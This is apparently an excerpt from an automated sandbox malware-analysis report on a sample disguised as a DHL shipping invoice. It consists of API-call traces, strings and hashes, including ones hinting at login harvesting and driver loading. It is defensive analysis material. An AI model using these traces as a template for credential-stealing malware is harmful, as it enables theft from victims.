                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                                      • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                                      • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                                      • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                                      • API String ID: 667068680-2887671607
                                                                                                                                                                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                      • API String ID: 1607361635-601624466
                                                                                                                                                                                                                                      • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                                      • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1043902810-0
                                                                                                                                                                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                                      • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                                      • API String ID: 3330709923-517860148
                                                                                                                                                                                                                                      • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                                      • String ID: logins$null
                                                                                                                                                                                                                                      • API String ID: 2148543256-2163367763
                                                                                                                                                                                                                                      • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                      • String ID: ---
                                                                                                                                                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                                      • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
